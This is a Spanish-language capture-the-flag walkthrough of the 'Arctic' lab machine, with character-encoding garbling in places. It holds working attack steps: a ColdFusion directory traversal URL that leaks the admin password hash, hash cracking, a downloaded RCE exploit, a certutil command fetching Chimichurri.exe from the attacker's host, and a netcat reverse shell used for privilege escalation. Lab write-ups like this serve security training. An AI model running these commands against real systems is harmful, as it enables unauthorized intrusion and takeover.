# Arctic
### 馃攳 RECONOCIMIENTO
En primer lugar, tras conectarnos a la m谩quina, utilizamos el comando:
```bash
ping -c 1 10.10.10.11
```
para verificar la conectividad de red.
A continuaci贸n, realizamos el comando:
```bash
nmap -sC -sV 10.10.10.11
```
para realizar un escaneo de puertos y servicios detallado en la direcci贸n IP.
Durante el escaneo se identificaron los siguientes puertos abiertos:
* **Puerto 135 (MSRPC)**: Este puerto es utilizado por Microsoft Windows RPC (Remote Procedure Call). Puede ser un objetivo para ataques de enumeraci贸n, explotaci贸n de vulnerabilidades en versiones desactualizadas o abuso de privilegios a trav茅s de DCOM.
* **Puerto 8500**: Identificado con un servicio desconocido (`fmtp?`). Se recomienda realizar un escaneo m谩s profundo para determinar su funcionalidad y verificar si est谩 asociado con software vulnerable.
* **Puerto 49154 (MSRPC)**: Otro puerto de Microsoft Windows RPC, com煤nmente utilizado para comunicaciones internas del sistema. Puede ser investigado para determinar si existen configuraciones inseguras o vulnerabilidades explotables.
A continuaci贸n, se proceder谩 a analizar cada uno de estos servicios en busca de posibles vectores de ataque.
### 馃攷 EXPLORACI脫N
Se utiliza el comando:
```bash
sudo nmap -sCV -p135,8500,49154 -v 10.10.10.11
```
para que nos proporcione m谩s informaci贸n sobre esos puertos espec铆ficamente.
A trav茅s del puerto **8500** corre una p谩gina web. Indagando un poco encontramos un panel de **Login** en el directorio `/administrator`. Es un panel de **Adobe Coldfusion**.
Buscamos exploits para explotarlo con Metasploit.
### 馃殌 **EXPLOTACI脫N**
{% embed url="" %}
Vemos que es un Directory Traversal y nos sale la direcci贸n comentada.
```bash
http://10.10.10.11/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
```
Vemos que la contrase帽a es un hash entonces con John vamos a crackearlo.
```
john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-sha1 hash
```
Tenemos la contrase帽a de admin por lo que nos logueamos.
Buscando m谩s exploits encontramos un RCE.
Nos la descargamos.
```bash
searchsploit -m cfm/webapps/50057.py
```
Ejecutamos.
```
python3 50057.py
```
### 馃攼 **PRIVILEGIOS**
Para escalar privilegios ya que WinPeas no funciona usamos esto.
{% @github-files/github-code-block url="" %}
```
python3 wes.py system_info.txt -i "Elevation of Privilege" -e
```
Se identific贸 un exploit que es el que vamos a usar para escalar privilegios.
{% embed url="" %}
{% @github-files/github-code-block url="" %}
```bash
certutil.exe -urlcache -f http://10.10.14.14:8000/Chimichurri.exe c.exe
```
Nos ponemo en escucha mientras ejecutamos el archivo.
```
nc -lvnp 4444
c.exe 10.10.14.14 4444
```
Ya somos **root**.
